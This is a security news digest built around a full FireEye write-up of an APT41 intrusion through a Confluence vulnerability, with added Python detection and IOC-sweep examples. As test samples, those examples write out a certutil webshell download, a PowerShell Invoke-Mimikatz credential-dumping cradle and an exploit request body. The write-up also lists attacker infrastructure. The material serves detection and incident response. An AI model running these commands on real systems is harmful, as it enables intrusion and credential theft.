Port 22

Forced Password Reset? Check Your Assumptions
August 21, 2019

Almost weekly now I hear from an indignant reader who suspects a data breach at a Web site they frequent that has just asked the reader to reset their password. Further investigation almost invariably reveals that the password reset demand was not the result of a breach but rather the site’s efforts to identify customers who are reusing passwords from other sites that have already been hacked.

But ironically, many companies taking these proactive steps soon discover that their explanation as to why they’re doing it can get misinterpreted as more evidence of lax security. This post attempts to unravel what’s going on here.

Google and Mozilla Block Kazakhstan's Root CA Certificates to Prevent Spying
August 21, 2019

In a move to protect its users based in Kazakhstan from government surveillance, Google and Mozilla finally today came forward and blocked Kazakhstan’s government-issued root CA certificate within their respective web browsing software.

Starting today, Firefox and Chrome users in Kazakhstan will see an error message stating that the certificate should not be trusted when attempting to access

Russian Hacking Group Targeting Banks Worldwide With Evolving Tactics
August 21, 2019

Silence APT, a Russian-speaking cybercriminal group, known for targeting financial organizations primarily in former Soviet states and neighboring countries is now aggressively targeting banks in more than 30 countries across America, Europe, Africa, and Asia.

Active since at least September 2016, Silence APT group’s most recent successful campaign was against Bangladesh-based Dutch-Bangla

Use This Privacy Tool to View and Clear Your 'Off-Facebook Activity' Data
August 20, 2019

Well, here we have great news for Facebook users, which is otherwise terrible for marketers and publishers whose businesses rely on Facebook advertisement for re-targeted conversions.

Following the Cambridge Analytica scandal, Facebook has taken several privacy measures in the past one year with an aim to give its users more control over their data and transparency about how the social

Surveillance as a Condition for Humanitarian Aid
August 20, 2019

Excellent op-ed on the growing trend to tie humanitarian aid to surveillance. Despite the best intentions, the decision to deploy technology like biometrics is built on a number of unproven assumptions: that technology solutions can fix deeply embedded political problems, that auditing for fraud requires entire populations to be tracked using their personal data, and that experimental technologies…

Zebra Industrial Printers
August 20, 2019

This advisory includes mitigations for an insufficiently protected credentials vulnerability in Zebra's Industrial Printers.

iOS 12.4 jailbreak released after Apple accidentally un-patches an old flaw
August 20, 2019

A fully functional jailbreak has been released for the latest iOS 12.4 on the Internet, making it the first public jailbreak in a long time, thanks to Apple.

Dubbed “unc0ver 3.5.0,” the jailbreak works with the updated iPhones, iPads and iPod Touches by leveraging a vulnerability that Apple previously patched in iOS 12.3 but accidentally reintroduced in the latest iOS version 12.4.

5 Ways to Improve the Patching Process
August 20, 2019

So many software vulnerabilities, so little time. But failure to patch them can have serious consequences. Here’s help for overwhelmed security teams.

How Activity Logs Help WordPress Admins Better Manage Website Security
August 20, 2019

Managing a WordPress website can sap a lot of your time and energy, which otherwise you’d spend on managing your business.

If you’re looking to cut down on the hours you spend troubleshooting WordPress technical and security problems, or better managing and monitoring your website and its users or customers, you need a WordPress activity log plugin.

This post explains how to use the WP

Hackers Planted Backdoor in Webmin, Popular Utility for Linux/Unix Servers
August 20, 2019

Following the public disclosure of a critical zero-day vulnerability in Webmin last week, the project’s maintainers today revealed that the flaw was not actually the result of a coding mistake made by the programmers.

Instead, it was secretly planted by an unknown hacker who successfully managed to inject a backdoor at some point in its build infrastructure that surprisingly persisted into

GAME OVER: Detecting and Stopping an APT41 Operation
August 19, 2019

In August 2019, FireEye released the Double Dragon report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponizing and exploiting them within a matter of days.

Our knowledge of this group's targets and activities is rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we're going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to show not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart the attack within hours of detection, protecting our client's network and limiting the threat actor's ability to gain a foothold and/or expose data.

GET TO DA CHOPPA!

In April 2019, FireEye's Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.


Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

Exploiting this vulnerability relies on two attacker-controlled fields in the request:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.
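The two fields described above are enough to write a request-body check for this exploit pattern. The following is an added example, not FireEye's detection logic and not the Yt1g3r proof of concept: it walks a decoded JSON POST body, flags any "_template" value that points at a remote URL or contains a traversal sequence, and pairs it with a "cmd" value. The request bodies are constructed; the "contentId"/"macro"/"params" layout around the two fields, the URL values and the documentation-range IP are assumptions, since the post only names the "_template" and "cmd" fields themselves.

```python
import json
from urllib.parse import urlparse

# Constructed request bodies, not traffic from the incident. The page states
# only that the exploit is a JSON POST carrying a "_template" that points at an
# attacker-chosen template and a "cmd" with the command to run; the surrounding
# "contentId"/"macro"/"params" layout and the URL values are assumptions.
BENIGN_BODY = json.dumps({
    "contentId": "1",
    "macro": {"name": "widget",
              "params": {"url": "https://www.example.com/video/123"}},
})
MALICIOUS_BODY = json.dumps({
    "contentId": "1",
    "macro": {"name": "widget",
              "params": {
                  "url": "https://www.example.com/video/123",
                  "_template": "https://github.com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm",
                  "cmd": "certutil -urlcache -split -f http://198.51.100.7/pass_sqzr.jsp test.jsp",
              }},
})

REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def _walk(obj, path=""):
    """Yield (dotted_path, key, value) for every key in a nested JSON value."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            here = f"{path}.{key}" if path else key
            yield here, key, val
            yield from _walk(val, here)
    elif isinstance(obj, list):
        for i, val in enumerate(obj):
            yield from _walk(val, f"{path}[{i}]")


def inspect_body(raw):
    """Summarise the exploit-relevant fields of one body; None if it is not JSON."""
    try:
        doc = json.loads(raw)
    except (TypeError, ValueError):
        return None
    found = {"template": None, "template_path": None, "remote": False,
             "traversal": False, "cmd": None}
    for here, key, val in _walk(doc):
        if key == "_template" and isinstance(val, str):
            found["template"], found["template_path"] = val, here
            # A template fetched from elsewhere, or reached via "..", is the
            # attacker-controlled Velocity template the post describes.
            found["remote"] = urlparse(val).scheme.lower() in REMOTE_SCHEMES
            found["traversal"] = ".." in val
        elif key == "cmd" and isinstance(val, str):
            found["cmd"] = val
    return found


def classify(raw):
    """'clean', 'suspicious' (template overridden) or 'exploit_attempt'."""
    found = inspect_body(raw)
    if found is None or found["template"] is None:
        return "clean"
    if (found["remote"] or found["traversal"]) and found["cmd"] is not None:
        return "exploit_attempt"
    return "suspicious"
```

Any "_template" override in a request body is worth an alert on its own; the "cmd" pairing only raises the verdict. Running this over decoded HTTP bodies rather than raw packets also catches the same fields when the attacker varies whitespace or key order.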


Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.


Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67.229.97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye's FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker's traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.


Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell post-exploitation framework. At the time of this blog post, the script was no longer available for download. The arguments passed to the script, "privilege::debug sekurlsa::logonpasswords exit exit", indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in memory. Per the observed HIGHNOON output, this command failed.
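Both the certutil download noted earlier (the fetch of pass_sqzr.jsp as test.jsp) and the PowerShell Invoke-Mimikatz attempt described above leave recognisable process command lines. The following is an added example, not FireEye's signature logic: a small command-line triage that matches certutil URL fetches, PowerShell download cradles and Mimikatz module strings, and also decodes a base64 -EncodedCommand argument before matching, which is a generalisation the post does not show. The sample command lines are constructed; the IP is a documentation address, and the cradle text is assumed, since the original script was never recovered.

```python
import base64
import re

# Constructed process command lines, not the incident's telemetry. The certutil
# line mirrors the download the post describes (documentation IP, same file
# name); the PowerShell line mirrors the Invoke-Mimikatz arguments quoted in the
# post. The -EncodedCommand variant is a generalisation not seen in the post.
PLAIN_CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
                "'http://198.51.100.7/Invoke-Mimikatz.ps1'); "
                "Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit exit'")
ENCODED = base64.b64encode(PLAIN_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLES = [
    "certutil.exe -urlcache -split -f http://198.51.100.7/pass_sqzr.jsp test.jsp",
    f'powershell.exe -nop -w hidden -c "{PLAIN_CRADLE}"',
    f"powershell.exe -nop -w hidden -enc {ENCODED}",
    r"notepad.exe C:\Users\analyst\notes.txt",
]

RULES = {
    # certutil fetching over a URL (-urlcache/-verifyctl are the usual abuses)
    "certutil_download": re.compile(
        r"(?i)\bcertutil(?:\.exe)?\b.*\s-(?:urlcache|verifyctl)\b.*\b(?:https?|ftp)://"),
    # in-memory download-and-execute cradles
    "powershell_download_cradle": re.compile(
        r"(?i)(?:DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|"
        r"Invoke-RestMethod|Start-BitsTransfer)"),
    # Mimikatz module syntax or the PowerSploit wrapper name
    "mimikatz_command": re.compile(
        r"(?i)(?:sekurlsa::|privilege::debug|lsadump::|kerberos::|Invoke-Mimikatz)"),
}
# powershell accepts any unambiguous prefix of -EncodedCommand
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline):
    """Match every rule against the raw line and, if present, its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in RULES.items() if rx.search(haystack))
    return {"cmdline": cmdline, "decoded": decoded, "rules": hits}


def triage_all(lines):
    return [triage(line) for line in lines]
```

Feed it process-creation events (Sysmon event 1, Windows 4688 with command-line logging, or EDR telemetry). The decode step matters because the encoded form carries none of the indicator strings in the raw command line; without it the third sample would pass clean.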

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • F64.data (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and F64.data on the system, the attacker ran the command

c64.exe f64.data "9839D7F1A0" -m

This specific command provided a password of 9839D7F1A0 to decrypt the contents of F64.data, and a switch of -m, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.

Detection               Signature Name
China Chopper           FE_Webshell_JSP_CHOPPER_1
                        FE_Webshell_Java_CHOPPER_1
                        FE_Webshell_MSIL_CHOPPER_1
HIGHNOON.PASSIVE        FE_APT_Backdoor_Raw64_HIGHNOON_2
                        FE_APT_Backdoor_Win64_HIGHNOON_2
Certutil Downloader     CERTUTIL.EXE DOWNLOADER (UTILITY)
                        CERTUTIL.EXE DOWNLOADER A (UTILITY)
ACEHASH                 FE_Trojan_AceHash

Indicators

Type          Indicator          MD5 Hash (if applicable)
File          test.jsp           84d6e4ba1f4268e50810dacc7bbc3935
File          64.dat             51e06382a88eb09639e1bc3565b444a6
File          Ins64.exe          e42555b218248d1a2ba92c1532ef6786
File          c64.exe            846cdb921841ac671c86350d494abf9c
File          F64.data           a919b4454679ef60b39c82bd686ed141
IP Address    67.229.97[.]229    N/A
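The file indicators above are the kind of list a responder would sweep a Confluence host with. The following is an added example, not a FireEye tool: it hashes every file under a directory, reports a hash match as a strong hit and a name-only match (for example a benign file that happens to be called Ins64.exe) as a weak one, and skips oversized or unreadable files rather than aborting. The demo directory it builds is constructed; the real samples are not embedded, so the hash hit is shown by adding the constructed file's own MD5 to the indicator set.

```python
import hashlib
import os
import sys
import tempfile

# Indicators copied from the post's table (MD5 -> file name). The IP address
# indicator is a network artefact and is not part of this file sweep.
FILE_IOCS = {
    "84d6e4ba1f4268e50810dacc7bbc3935": "test.jsp",
    "51e06382a88eb09639e1bc3565b444a6": "64.dat",
    "e42555b218248d1a2ba92c1532ef6786": "Ins64.exe",
    "846cdb921841ac671c86350d494abf9c": "c64.exe",
    "a919b4454679ef60b39c82bd686ed141": "F64.data",
}
IOC_NAMES = {name.lower() for name in FILE_IOCS.values()}


def md5_file(path, chunk=1 << 20):
    """Stream a file through MD5 so large files do not have to fit in memory."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def sweep(root, hashes=FILE_IOCS, names=IOC_NAMES, max_size=64 << 20):
    """Walk root and report hash matches (strong) and name-only matches (weak)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                digest = md5_file(path)
            except OSError:
                continue  # unreadable or vanished mid-sweep; keep going
            if digest in hashes:
                hits.append({"path": path, "md5": digest,
                             "match": "hash", "ioc": hashes[digest]})
            elif fname.lower() in names:
                hits.append({"path": path, "md5": digest,
                             "match": "name_only", "ioc": fname})
    return hits


def demo():
    """Constructed directory: a renamed 'dropper', a name-only decoy, a benign file.

    The real samples are not embedded; dropper.bin is matched by adding its own
    (constructed) hash to the IOC set to show what a hash hit looks like.
    """
    with tempfile.TemporaryDirectory() as root:
        sub = os.path.join(root, "Confluence")
        os.makedirs(sub)
        with open(os.path.join(sub, "dropper.bin"), "wb") as fh:
            fh.write(b"constructed payload, not the real Ins64.exe")
        with open(os.path.join(sub, "Ins64.exe"), "wb") as fh:
            fh.write(b"constructed file that only shares the IOC name")
        with open(os.path.join(root, "README.txt"), "wb") as fh:
            fh.write(b"benign")
        extra = dict(FILE_IOCS)
        extra[md5_file(os.path.join(sub, "dropper.bin"))] = "Ins64.exe (renamed)"
        return sweep(root, hashes=extra)


if __name__ == "__main__":
    # usage: python3 ioc_sweep.py "C:\Program Files\Atlassian\Confluence"
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for hit in (sweep(target) if target else demo()):
        print(f'{hit["match"]:9} {hit["md5"]} {hit["ioc"]:22} {hit["path"]}')
```

Treat a name-only hit as a lead, not a finding: APT41 recompiles malware quickly, so a file with one of these names and a different hash still deserves a look, while a benign file with the same name is common enough that the match alone proves nothing.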

Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41's activities. You can also find a direct link to the public APT41 report here.

Acknowledgements

Thanks to Raymond Leong of Advanced Practices and Willi Ballenthin of FLARE for identification and reversing of the HIGHNOON.PASSIVE malware.

The Rise of Bulletproof Residential Networks
August 19, 2019

Cybercrooks increasingly are anonymizing their malicious traffic by routing it through residential broadband and wireless data connections. Most often, those connections are hacked computers, mobile phones, or home routers. But this is the story of a sprawling “bulletproof residential VPN” service that appears to have been built by acquiring chunks of Internet addresses from some of the largest ISPs and mobile data providers in the United States and abroad.

Uncovering a MyKings Variant With Bootloader Persistence via Managed Detection and Response
August 19, 2019

When we first investigated MyKings in 2017, we focused on how the cryptominer-dropping botnet malware used WMI for persistence. Like Mirai, MyKings seems to be constantly undergoing changes to its infection routine. The variant we analyzed for this incident did not just have a single method of retaining persistence but multiple ones, as discussed in the previous section. In addition to WMI, it also used the registry, the task scheduler, and a bootkit, the most interesting of which is the bootkit.

Influence Operations Kill Chain
August 19, 2019

Influence operations are elusive to define. The Rand Corp.’s definition is as good as any: “the collection of tactical information about an adversary as well as the dissemination of propaganda in pursuit of a competitive advantage over an opponent.” Basically, we know it when we see it, from bots controlled by the Russian Internet Research Agency to Saudi attempts to…

IT threat evolution Q2 2019. Statistics
August 19, 2019

Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe, 217,843,293 unique URLs triggered Web Anti-Virus components.

Friday Squid Blogging: Robot Squid Propulsion
August 16, 2019

Interesting research: The squid robot is powered primarily by compressed air, which it stores in a cylinder in its nose (do squids have noses?). The fins and arms are controlled by pneumatic actuators. When the robot wants to move through the water, it opens a valve to release a modest amount of compressed air; releasing the air all at once…

Adware Posing as 85 Photography and Gaming Apps on Google Play Installed Over 8 Million Times
August 16, 2019

The mobile platform is ubiquitous, enabling users to make online transactions, run their everyday lives, or even use it in the workplace. It's no surprise that fraudsters and cybercriminals would want to cash in on it. Delivering adware, for example, enables them to monetize affected devices while attempting to be innocuous. And while they may be viewed as a nuisance at best, mobile ad fraud- and adware-related incidents became so rampant last year that they cost businesses hefty financial losses.

Software Vulnerabilities in the Boeing 787
August 16, 2019

Boeing left its software unprotected, and researchers have analyzed it for vulnerabilities: At the Black Hat security conference today in Las Vegas, Santamarta, a researcher for security firm IOActive, plans to present his findings, including the details of multiple serious security flaws in the code for a component of the 787 known as a Crew Information Service/Maintenance System. The CIS/MS…
